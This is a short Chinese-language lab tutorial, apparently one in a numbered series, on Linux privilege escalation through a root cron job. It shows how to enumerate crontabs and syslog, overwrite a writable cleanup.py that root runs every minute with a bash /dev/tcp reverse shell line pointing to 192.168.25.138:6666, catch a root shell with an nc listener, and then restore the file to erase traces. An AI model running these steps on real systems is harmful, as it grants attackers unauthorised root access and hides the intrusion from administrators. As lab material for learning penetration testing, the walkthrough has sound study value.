Linux提权之计划任务反弹shell提权(十一)
实验环境还是一样的
当获取一个linux普通用户的时,查看计划任务
首先我们退出root用户
cat /etc/crontab
crontab -l
查看当前用户命令
/var/spool/cron/crontabs/root
这个目录是root任务文件 默认是不是root权限是 看不到
tail -f /var/log/syslog
咋们切换用户web1
查看日志文件 发现root每一分钟会执行一次 cleanup.py文件
然后复制一份文件 到tmp目录 用于修改回来
cp /script/cleanup.py /tmp/cleanup.py
然后我们修改
/script/cleanup.py
这个.py文件
bash -i >& /dev/tcp/192.168.25.138/6666 0>&1
然后在kail新建窗口 开启监听
nc -lvnp 6666
等待计划任务执行
现在返回shell
root
提权成功
然后我们消除痕迹 我们把原来的文件修改回来 就好了